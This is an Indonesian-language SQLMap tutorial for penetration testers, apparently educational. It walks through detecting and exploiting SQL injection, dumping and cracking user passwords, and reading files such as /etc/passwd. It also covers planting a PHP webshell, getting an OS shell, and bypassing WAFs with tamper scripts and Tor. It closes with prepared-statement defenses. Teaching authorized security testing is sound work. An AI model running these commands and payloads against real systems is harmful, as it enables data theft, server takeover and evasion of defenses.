π Daftar Isi
1. Pengenalan SQLMap
SQLMap adalah tool open source otomatis untuk mendeteksi dan mengeksploitasi kerentanan SQL Injection pada aplikasi web. Dikembangkan oleh Bernardo Damele dan Miroslav Stampar, SQLMap menjadi tool wajib dalam toolkit setiap penetration tester profesional.
SQL Injection sendiri adalah kerentanan yang memungkinkan penyerang untuk memanipulasi query SQL yang dikirim ke database. Dengan SQL Injection, penyerang dapat membaca data sensitif, memodifikasi data, menjalankan operasi administratif pada database, dan dalam beberapa kasus dapat mengambil alih sistem operasi server.
SQLMap mendukung semua jenis SQL injection yang umum ditemukan: Boolean-based blind, Time-based blind, Error-based, UNION query, Stacked queries, dan Out-of-band. Tool ini mendukung lebih dari 30 database management system (DBMS) termasuk MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, dan banyak lagi.
Mengapa SQL Injection Masih Relevan?
| Fakta | Penjelasan |
|---|---|
| OWASP Top 10 | SQL Injection masuk dalam OWASP Top 10 β Injection (A03:2021) |
| Paling Banyak Ditemukan | SQLi tetap menjadi salah satu kerentanan paling umum di web apps |
| Dampak Tinggi | Dapat menyebabkan full database compromise, data breach, dan RCE |
| Regulasi | PCI DSS, GDPR, dan regulasi lain mewajibkan perlindungan dari SQLi |
| Automasi Mudah | SQLMap membuat eksploitasi SQLi sangat mudah β bahkan oleh pemula |
β οΈ Peringatan Hukum
SQL Injection testing hanya boleh dilakukan pada sistem yang Anda miliki atau yang memiliki izin tertulis (authorization letter). SQL Injection pada sistem tanpa izin adalah kejahatan siber yang dapat dipidanakan.
Diagram: Alur Kerja SQLMap
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β SQLMAP WORKFLOW β β β β ββββββββββββ ββββββββββββ ββββββββββββ β β β 1. INPUTβ β 2. DETECTβ β 3. ENUM β β β β β β β β β β β β URL ββββΆβ Test all ββββΆβ DBMS β β β β POST β β params β β Databasesβ β β β Cookie β β DBMS β β Tables β β β β Headers β β Techniqueβ β Columns β β β ββββββββββββ ββββββββββββ ββββββββββββ β β β β β ββββββββββββ ββββββββββββ ββββββββββββ β β β β6. PREVENTβ β5. TAKEOVER β 4. EXTRACTβ β β β β βββββ βββββ βββββββ β β β Patch β β OS Shell β β Dump dataβ β β β Parameterβ β File R/W β β Users β β β β queries β β Backdoor β β Passwordsβ β β ββββββββββββ ββββββββββββ ββββββββββββ β β β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
2. Instalasi & Setup
2.1 Instalasi SQLMap
Bash β Instalasi SQLMap
# ===== INSTALASI SQLMAP ===== # Di Kali Linux β sudah termasuk default # Jika belum ada: sudo apt update && sudo apt install sqlmap # Install dari GitHub (versi terbaru) git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev # Jalankan python sqlmap.py --version # atau python3 sqlmap.py --version # ===== ALIAS UNTUK MEMUDAHKAN ===== echo 'alias sqlmap="python3 /path/to/sqlmap-dev/sqlmap.py"' >> ~/.bashrc source ~/.bashrc # ===== UPDATE SQLMAP ===== cd sqlmap-dev git pull origin master # atau python3 sqlmap.py --update # ===== VERIFIKASI INSTALASI ===== sqlmap --version # sqlmap/1.x.x # Test koneksi database (opsional) sqlmap --wizard # Mode wizard untuk pemula
2.2 Persiapan Testing Environment
Setup β Lab Testing dengan DVWA
# ===== SETUP LAB UNTUK BELAJAR ===== # 1. DVWA (Damn Vulnerable Web Application) β Populer untuk belajar docker run --rm -it -p 80:80 vulnerables/web-dvwa # 2. SQLi-Labs (khusus untuk belajar SQL Injection) git clone https://github.com/Audi-1/sqli-labs.git cd sqli-labs # Setup di web server # 3. HackTheBox / TryTheBox β Lab online legal # 4. PortSwigger Web Security Academy β Gratis # https://portswigger.net/web-security/sql-injection # ===== MULAI TESTING ===== # Buka DVWA di browser: http://localhost # Login: admin / password # Set security level ke: Low # Navigate ke: SQL Injection page # Perhatikan URL: http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit # Parameter "id" kemungkinan rentan terhadap SQLi
3. Deteksi SQL Injection
3.1 Basic Detection
Bash β Deteksi SQL Injection dengan SQLMap
# ===== BASIC DETECTION ===== # URL dengan parameter GET sqlmap -u "http://target.com/page.php?id=1" # Dengan POST data sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin" # Dengan cookie (authenticated testing) sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" # Dengan custom headers sqlmap -u "http://target.com/api/data" --headers="X-Token: abc123\nAuthorization: Bearer xyz" # Dengan HTTP request file (dari Burp Suite) sqlmap -r request.txt # request.txt = raw HTTP request yang disimpan dari Burp # ===== DETECTION OPTIONS ===== # Test semua parameter (default: test yang terdeteksi) sqlmap -u "http://target.com/page.php?id=1&name=test" --batch # Test parameter spesifik sqlmap -u "http://target.com/page.php?id=1&name=test" -p id # Force test bahkan jika parameter tidak terdeteksi sqlmap -u "http://target.com/page.php?id=1" --skip-static # Test level (1-5, default: 1) # Level 1 = basic, Level 5 = test semua sqlmap -u "http://target.com/page.php?id=1" --level=5 # Risk level (1-3, default: 1) # Risk 1 = safe, Risk 3 = include heavy tests sqlmap -u "http://target.com/page.php?id=1" --risk=3
3.2 Membaca Hasil Deteksi
Output β Contoh Hasil SQLMap Detection
# ===== CONTOH OUTPUT DETEKSI ===== # [*] starting @ 10:30:00 2026-06-26 # # [INFO] testing connection to the target URL # [INFO] checking if the target is protected by some kind of WAF/IPS # [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' # [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY clause' # [INFO] testing 'MySQL >= 5.0.12 time-based blind' # [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' # # GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] # # sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests: # --- # Parameter: id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: id=1 AND 1=1 # # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY clause # Payload: id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) # # Type: time-based blind # Title: MySQL >= 5.0.12 time-based blind # Payload: id=1 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 3 columns # Payload: id=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x7162767671,0x4e646d6e534d68575a56546f4250757276674d4d6a6b6d7851584b5373646b5a577854486f487675,0x717a767671)-- - # --- # # [INFO] the back-end DBMS is MySQL # back-end DBMS: MySQL >= 5.0
4. Teknik SQL Injection
SQLMap mendukung berbagai teknik SQL Injection yang berbeda. Memahami teknik-teknik ini penting untuk bisa menggunakan SQLMap secara efektif dan memahami apa yang terjadi di balik layar.
4.1 Boolean-Based Blind
Penjelasan β Boolean-Based Blind SQLi
# ===== BOOLEAN-BASED BLIND ===== # Prinsip: Mengirim query yang menghasilkan TRUE atau FALSE # dan mengamati perbedaan response (content, HTTP code, dll.) # Contoh query: # Normal: SELECT * FROM users WHERE id = 1 # Injected (TRUE): SELECT * FROM users WHERE id = 1 AND 1=1 # Injected (FALSE): SELECT * FROM users WHERE id = 1 AND 1=2 # Jika response berbeda antara TRUE dan FALSE β rentan! # SQLMap otomatis membandingkan response panjang, content, dll. # Force technique spesifik: sqlmap -u "http://target.com/page.php?id=1" --technique=B # Technique codes: # B = Boolean-based blind # E = Error-based # U = UNION query-based # S = Stacked queries # T = Time-based blind # O = Out-of-band # Gabungan teknik: sqlmap -u "http://target.com/page.php?id=1" --technique=BEU # Hanya test Boolean, Error, dan UNION
4.2 Time-Based Blind
Penjelasan β Time-Based Blind SQLi
# ===== TIME-BASED BLIND =====
# Prinsip: Menggunakan fungsi sleep/delay untuk inferensi data
# Jika query TRUE β server delay, Jika FALSE β response cepat
# MySQL: AND SLEEP(5)
# PostgreSQL: AND pg_sleep(5)
# MSSQL: WAITFOR DELAY '0:0:5'
# Oracle: AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)
# Force time-based:
sqlmap -u "http://target.com/page.php?id=1" --technique=T
# Custom delay time (default: 5 detik)
sqlmap -u "http://target.com/page.php?id=1" --time-sec=10
# Gunakan --time-sec untuk menghindari false positive pada
# koneksi lambat
4.3 Error-Based & UNION-Based
Penjelasan β Error-Based dan UNION SQLi
# ===== ERROR-BASED =====
# Prinsip: Memanfaatkan pesan error database untuk mengekstrak data
# Sangat cepat karena data dikembalikan langsung di pesan error
# MySQL error functions:
# - EXTRACTVALUE()
# - UPDATEXML()
# - FLOOR(RAND()) GROUP BY (double query error)
# Contoh:
# id=1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))
# Error: XPATH syntax error: '~5.7.26~'
# Force error-based:
sqlmap -u "http://target.com/page.php?id=1" --technique=E
# ===== UNION-BASED =====
# Prinsip: Menggunakan UNION SELECT untuk mengambil data
# dari kolom yang berbeda dalam response yang sama
# Contoh:
# id=-1 UNION SELECT 1,2,3
# id=-1 UNION SELECT 1,version(),3
# id=-1 UNION SELECT 1,group_concat(table_name),3
# FROM information_schema.tables
# Force UNION:
sqlmap -u "http://target.com/page.php?id=1" --technique=U
# Jika UNION gagal, coba dengan --union-cols dan --union-char:
sqlmap -u "http://target.com/page.php?id=1" \
--technique=U --union-cols=5 --union-char=1
4.4 Stacked Queries & Out-of-Band
Penjelasan β Stacked & Out-of-Band
# ===== STACKED QUERIES =====
# Prinsip: Menjalankan multiple SQL statements dalam satu request
# Mendukung INSERT, UPDATE, DELETE β bukan hanya SELECT
# Contoh:
# id=1; DROP TABLE users--
# id=1; INSERT INTO users VALUES('hacker','hacked')--
# Stacked queries didukung di:
# - PostgreSQL (selalu)
# - MSSQL (selalu)
# - MySQL (hanya jika multi-query diaktifkan)
# - Oracle (hanya melaluiζδΊ teknik)
# Force stacked:
sqlmap -u "http://target.com/page.php?id=1" --technique=S
# ===== OUT-OF-BAND =====
# Prinsip: Mengekstrak data melalui jalur alternatif (DNS/HTTP)
# Berguna ketika tidak ada direct response
# MySQL: LOAD_FILE() ke UNC path β DNS exfiltration
# MSSQL: xp_dirtree β DNS exfiltration
# Oracle: HTTPurity
# Gunakan out-of-band:
sqlmap -u "http://target.com/page.php?id=1" --technique=O
5. Database Enumeration
5.1 Informasi Database
Bash β Database Enumeration dengan SQLMap
# ===== ENUMERASI DATABASE ===== # Dapatkan nama DBMS sqlmap -u "http://target.com/page.php?id=1" --dbms # Dapatkan versi DBMS sqlmap -u "http://target.com/page.php?id=1" --banner # Dapatkan current user sqlmap -u "http://target.com/page.php?id=1" --current-user # Dapatkan current database sqlmap -u "http://target.com/page.php?id=1" --current-db # Dapatkan hostname sqlmap -u "http://target.com/page.php?id=1" --hostname # Cek apakah user adalah DBA sqlmap -u "http://target.com/page.php?id=1" --is-dba # Dapatkan semua informasi di atas sekaligus sqlmap -u "http://target.com/page.php?id=1" --banner --current-user --current-db --is-dba
5.2 Enumerasi Database, Tables, Columns
Bash β Enumerate Databases, Tables, Columns
# ===== LIST SEMUA DATABASE ===== sqlmap -u "http://target.com/page.php?id=1" --dbs # Output: # [*] information_schema # [*] mysql # [*] performance_schema # [*] webapp_db # ===== LIST TABLES DALAM DATABASE ===== sqlmap -u "http://target.com/page.php?id=1" -D webapp_db --tables # Output: # +------------+ # | users | # | products | # | orders | # | admin | # +------------+ # ===== LIST COLUMNS DALAM TABLE ===== sqlmap -u "http://target.com/page.php?id=1" -D webapp_db -T users --columns # Output: # +----------+--------------+ # | Column | Type | # +----------+--------------+ # | id | int(11) | # | username | varchar(50) | # | password | varchar(255) | # | email | varchar(100) | # | role | varchar(20) | # +----------+--------------+ # ===== JUMLAH BARIS ===== sqlmap -u "http://target.com/page.php?id=1" -D webapp_db -T users --count # Output: [INFO] table 'webapp_db.users' has 1523 entries
6. Data Extraction
6.1 Dump Data
Bash β Data Extraction dengan SQLMap
# ===== DUMP SELURUH TABLE =====
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump
# Data disimpan di: ~/.sqlmap/output/target.com/dump/webapp_db/users.csv
# ===== DUMP KOLOM SPESIFIK =====
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users -C "username,password" --dump
# ===== DUMP DENGAN LIMIT =====
# Hanya ambil 10 baris pertama
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --start=1 --stop=10
# ===== DUMP CONDITIONAL =====
# Hanya ambil data dengan role=admin
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --where="role='admin'"
# ===== DUMP SEMUA DATABASE =====
# β οΈ Gunakan dengan hati-hati β sangat lambat!
sqlmap -u "http://target.com/page.php?id=1" --dump-all
# ===== DUMP DENGAN PASSWORD CRACKING =====
# SQLMap otomatis mendeteksi hash dan mencoba crack
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users -C "username,password" --dump \
--passwords
# Menggunakan dictionary attack dengan wordlist internal
# ===== SEARCH DATA =====
# Cari kolom yang mengandung "password"
sqlmap -u "http://target.com/page.php?id=1" --search -C password
# Cari tabel yang mengandung "user"
sqlmap -u "http://target.com/page.php?id=1" --search -T user
# Cari database yang mengandung "web"
sqlmap -u "http://target.com/page.php?id=1" --search -D web
6.2 Format Output
Bash β Output Formatting & Logging
# ===== CUSTOM OUTPUT =====
# Output ke CSV file
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --dump-format=CSV
# Output formats: CSV, HTML, SQLITE
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --dump-format=HTML
# ===== LOGGING =====
# Verbose output (lebih detail)
sqlmap -u "http://target.com/page.php?id=1" -v 3
# Level: 0-6 (default: 1)
# Log ke file
sqlmap -u "http://target.com/page.php?id=1" \
--batch --output-dir=/tmp/sqlmap_logs/
# ===== BATCH MODE (otomatis, tanpa interaksi) =====
# Berguna untuk automation
sqlmap -u "http://target.com/page.php?id=1" --batch
# Otomatis memilih default untuk semua prompt
# ===== SESSION MANAGEMENT =====
# Simpan session untuk melanjutkan nanti
sqlmap -u "http://target.com/page.php?id=1" \
--session-file=/tmp/session.session
# Lanjutkan session
sqlmap -u "http://target.com/page.php?id=1" \
--session-file=/tmp/session.session --flush-session
7. OS Takeover
7.1 File System Access
Bash β File System Access via SQLMap
# ===== READ FILES =====
# Baca file dari server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/hostname"
sqlmap -u "http://target.com/page.php?id=1" --file-read="/var/www/html/config.php"
sqlmap -u "http://target.com/page.php?id=1" --file-read="C:\\Windows\\win.ini"
sqlmap -u "http://target.com/page.php?id=1" --file-read="C:\\xampp\\htdocs\\config.php"
# ===== WRITE FILES =====
# Tulis file ke server (memerlukan FILE privilege)
# Berguna untuk menulis webshell
sqlmap -u "http://target.com/page.php?id=1" \
--file-write="shell.php" \
--file-dest="/var/www/html/shell.php"
# Content shell.php:
# <?php echo system($_GET['cmd']); ?>
# ===== CHECK PRIVILEGE =====
sqlmap -u "http://target.com/page.php?id=1" --is-dba
# Harus DBA untuk file read/write di MySQL
7.2 OS Shell
Bash β OS Shell via SQLMap
# ===== OS SHELL ===== # Dapatkan interactive OS shell # Memerlukan: DBA privilege + FILE privilege (MySQL) sqlmap -u "http://target.com/page.php?id=1" --os-shell # Jika berhasil, SQLMap akan: # 1. Meng-upload webshell ke server # 2. Memberikan interactive shell # ===== OS COMMAND EXECUTION ===== # Jalankan single command sqlmap -u "http://target.com/page.php?id=1" --os-cmd="id" sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" # ===== SQL SHELL ===== # Interactive SQL shell sqlmap -u "http://target.com/page.php?id=1" --sql-shell # Dari SQL shell: sql-shell> SELECT version(); sql-shell> SELECT user(); sql-shell> SHOW DATABASES; sql-shell> SELECT * FROM mysql.user;
8. Tamper Scripts & WAF Bypass
Tamper scripts adalah fitur paling powerful dari SQLMap untuk bypass WAF (Web Application Firewall) dan IPS (Intrusion Prevention System). Tamper script memodifikasi payload SQL injection agar tidak terdeteksi oleh sistem keamanan, sambil tetap menjalankan fungsi yang sama.
8.1 Daftar Tamper Scripts Populer
| Tamper Script | Fungsi | Target WAF |
|---|---|---|
| between | Mengganti > dengan BETWEEN | Generic WAF |
| space2comment | Mengganti spasi dengan komentar /**/ | ModSecurity |
| space2plus | Mengganti spasi dengan + | Generic WAF |
| space2randomblank | Mengganti spasi dengan whitespace random | Generic WAF |
| randomcase | Mengganti case huruf secara random | Case-sensitive WAF |
| charencode | URL-encode semua karakter | ModSecurity |
| base64encode | Base64 encode seluruh payload | Generic WAF |
| halfversionedmorekeywords | Menambahkan MySQL comment version | MySQL-specific WAF |
| apostrophemask | Mengganti apostrophe dengan UTF-8 | Generic WAF |
| greatest | Mengganti > dengan GREATEST() | Generic WAF |
| ifnull2ifisnull | Mengganti IFNULL dengan IF IS NULL | MySQL WAF |
| modsecurityversioned | Exploit ModSecurity bypass | ModSecurity |
| unionalltounion | Mengganti UNION ALL dengan UNION | Generic WAF |
| unmagicquotes | Bypass magic_quotes_gpc | PHP magic_quotes |
| lowercase | Mengubah semua ke lowercase | Case-sensitive WAF |
8.2 Menggunakan Tamper Scripts
Bash β Tamper Script Usage
# ===== SINGLE TAMPER =====
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment
# ===== MULTIPLE TAMPER (STACKING) =====
# Gunakan koma untuk menggabungkan beberapa tamper
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,randomcase,between
# Urutan tamper penting! Script dijalankan secara berurutan
# ===== TAMPER KOMBINASI POPULER =====
# Kombinasi untuk ModSecurity bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,randomcase,charencode
# Kombinasi untuk Cloudflare bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=between,randomcase,space2plus
# Kombinasi untuk Akamai bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2randomblank,randomcase,greatest
# ===== LIST SEMUA TAMPER SCRIPTS =====
sqlmap --list-tamper
# ===== TAMPER DENGAN CUSTOM EXPRESSION =====
# Beberapa tamper mendukung parameter
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,between,randomcase \
--skip-static \
--random-agent \
--technique=BEU
8.3 WAF Bypass Tanpa Tamper
Bash β WAF Bypass Techniques
# ===== WAF BYPASS TECHNIQUES =====
# 1. Random User-Agent
sqlmap -u "http://target.com/page.php?id=1" --random-agent
# 2. Custom User-Agent
sqlmap -u "http://target.com/page.php?id=1" \
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# 3. Delay antara requests (menghindari rate limiting)
sqlmap -u "http://target.com/page.php?id=1" --delay=2
# 4. Proxy untuk bypass IP block
sqlmap -u "http://target.com/page.php?id=1" \
--proxy="http://127.0.0.1:8080" # Burp Suite proxy
# 5. TOR untuk anonimitas
sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5
# 6. Custom headers
sqlmap -u "http://target.com/page.php?id=1" \
--headers="X-Forwarded-For: 127.0.0.1\nX-Real-IP: 10.0.0.1"
# 7. Chunked transfer encoding
sqlmap -u "http://target.com/page.php?id=1" --chunked
# 8. HTTP parameter pollution
sqlmap -u "http://target.com/page.php?id=1" --hpp
# 9. Skip URL encoding
sqlmap -u "http://target.com/page.php?id=1" --skip-urlencode
# 10. Custom prefix/suffix
sqlmap -u "http://target.com/page.php?id=1" \
--prefix="')" --suffix="-- -"
9. Teknik Advanced
9.1 Request Manipulation
Bash β Advanced Request Manipulation
# ===== DENGAN REQUEST FILE (RAW HTTP) =====
# Simpan raw request dari Burp Suite ke file:
# POST /login.php HTTP/1.1
# Host: target.com
# Cookie: PHPSESSID=abc123
# Content-Type: application/x-www-form-urlencoded
#
# username=admin*&password=test*
# (*) = marker untuk parameter yang ditest
sqlmap -r request.txt --batch
# ===== JSON PAYLOAD =====
# API modern sering menggunakan JSON
sqlmap -u "http://target.com/api/login" \
--data='{"username":"admin*","password":"test"}' \
--headers="Content-Type: application/json" \
-p username
# ===== MULTIPART FORM DATA =====
# Upload form
sqlmap -u "http://target.com/upload.php" \
--data='name=test*&file=test.pdf' \
--method=PUT
# ===== CUSTOM INJECTION MARKER =====
# (*) menandai titik injeksi
sqlmap -u "http://target.com/page.php?id=1*&name=test"
# ===== SECOND ORDER INJECTION =====
# Ketika payload dieksekusi di request kedua
sqlmap -u "http://target.com/register.php" \
--data="username=test*&password=test" \
--second-url="http://target.com/profile.php"
# ===== CUSTOM EVAL =====
# Menjalankan Python code untuk memodifikasi payload
sqlmap -u "http://target.com/page.php?id=1" \
--eval="import hashlib; id=hashlib.md5(id.encode()).hexdigest()"
9.2 Optimization & Performance
Bash β Optimization Tips
# ===== PERFORMA & OPTIMASI =====
# 1. Multi-threading (default: 1)
sqlmap -u "http://target.com/page.php?id=1" --threads=10
# Max: 10 threads (hati-hati dengan server target)
# 2. Predictive output (cepat dengan mengurangi request)
sqlmap -u "http://target.com/page.php?id=1" --predict-output
# 3. Skip teks tertentu yang stabil
sqlmap -u "http://target.com/page.php?id=1" \
--string="found" # Response yang mengandung "found" = TRUE
# 4. Skip berdasarkan HTTP code
sqlmap -u "http://target.com/page.php?id=1" \
--code=200 # Hanya HTTP 200 yang dianggap valid
# 5. Batch mode β tidak ada interaksi
sqlmap -u "http://target.com/page.php?id=1" --batch
# 6. Flush session β mulai dari awal
sqlmap -u "http://target.com/page.php?id=1" --flush-session
# 7. Skip tertentu test
sqlmap -u "http://target.com/page.php?id=1" \
--skip="time-based" --skip="stacked"
# 8. Tuning detection
sqlmap -u "http://target.com/page.php?id=1" \
--level=5 --risk=3 \
--threads=5 \
--batch
10. Pencegahan SQL Injection
10.1 Prepared Statements (Parameterized Queries)
PHP β Prepared Statements
<?php
// β RENTAN TERHADAP SQL INJECTION
$user_id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $user_id";
$result = mysqli_query($conn, $query);
// Attacker bisa inject: id=1 UNION SELECT password FROM admin
// β
AMAN β Prepared Statements (PDO)
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass');
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$stmt->execute(['id' => $_GET['id']]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
// β
AMAN β Prepared Statements (MySQLi)
$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
// β
AMAN β Jangan lupa validasi input!
$user_id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($user_id === false) {
die("Invalid input");
}
// β
AMAN β Input validation + parameterized queries
// Selalu gabungkan keduanya!
?>
10.2 Best Practices Pencegahan
| Teknik | Prioritas | Penjelasan |
|---|---|---|
| Prepared Statements | π΄ Wajib | Pisahkan query SQL dari data β pencegahan utama |
| ORM (Object-Relational Mapping) | π΄ Wajib | Gunakan ORM seperti SQLAlchemy, Eloquent, Hibernate |
| Input Validation | π΄ Wajib | Validasi semua input β whitelist approach |
| Least Privilege | π΄ Wajib | Database user hanya memiliki permission minimal |
| Stored Procedures | π Penting | Gunakan stored procedures yang aman |
| Error Handling | π Penting | Jangan expose SQL error ke user |
| WAF | π‘ Pelengkap | Web Application Firewall sebagai lapisan tambahan |
| Security Testing | π΄ Wajib | Regular pen test dan code review |
11. Quiz Pemahaman
Uji pemahaman Anda tentang SQLMap: